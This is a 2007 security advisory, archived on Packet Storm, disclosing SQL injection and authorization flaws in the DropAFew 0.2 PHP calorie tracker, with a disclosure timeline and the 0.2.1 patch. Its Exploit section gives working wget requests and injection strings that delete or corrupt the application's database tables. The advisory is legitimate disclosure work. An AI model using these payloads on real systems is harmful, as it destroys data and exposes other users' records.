what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AKLINK-SA-2007-002.txt

AKLINK-SA-2007-002.txt
Posted Apr 11, 2007
Authored by Alexander Klink | Site cynops.de

DropAFew versions 0.2 and below suffer from SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
advisories | CVE-2007-1363, CVE-2007-1364
SHA-256 | d70a0ebccd74c188c38dd1d78303d396a7e2aa349786b47a134cca14004840c7

AKLINK-SA-2007-002.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================
||| Security Advisory AKLINK-SA-2007-002 |||
||| CVE-2007-1363 (CVE candidate) |||
||| CVE-2007-1364 (CVE candidate) |||
============================================

DropAFew - Multiple vulnerabilities (SQL injection, authorization issue)
========================================================================

Date released: 10.04.2007
Date reported: 07.03.2007
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink@cynops.de
https://www.cynops.de/advisories/CVE-2007-1363.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt)
https://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364

Vendor: Chris Bratlien (Open Source)
Product: DropAFew - a multi-user calorie counting program using PHP
Website: http://www.dropafew.com
Vulnerability: SQL injection attack, authorization issues
Class: remote
Status: patched
Severity: moderate (database corruption and some information disclosure)
Releases known to be affected: 0.2
Releases known NOT to be affected: 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

SQL injection is possible in different places which may lead to the
deletion or corruption of the two most important database tables of
the application.
The vulnerability works without query stacking and with magic_quotes_gpw
set to on.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

An SQL injection is present in search.php and search-pda.php on the
delete action. Setting id for example to "1 OR id > 0 --" deletes the
foodfacts table completely.
In editlogcal.php, the save action allows for an SQL injection into
an UPDATE statement via the calories variable. Setting calories for
example to "1000 WHERE id > 0 /*" corrupts the logcal database reducing
it to the same entry (so it looks like everybody keeps eating the same
thing again and again).
In editlogcal.php, the id parameter is not checked for authorization,
so it is possible for a user to see all logged calories for all users
(without knowing who ate what, though).
Furthermore, the links.php allows a user to add publicly viewable links
to everyones link page, which a user can not remove, which might be
a possibility for spam.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit:

# create new user
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php
# delete foodfacts table
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php
# make everyone have eaten 1000 strawberries, but hey, they were only 10
# calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

Filtering the requests, restricting access to the application to
trusted users only.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 07.03.2007: Problem reported to author
* 07.03.2007: Vendor replies and confirms the problem, presents ideas
for a solution
* 03.04.2007: Contacted vendor to check back on status
* 03.04.2007: Vendor responds with updated version 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Update to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink, Cynops GmbH (discovery and exploit development)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFGGqWp8Q3kKmNSxUURAoaKAKCWPDyFVZnZnw7J6DCr4PXp/hwFMACggEos
UR4k+AOgSkfFGL8HYIBoyjY=
=nelw
-----END PGP SIGNATURE-----

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close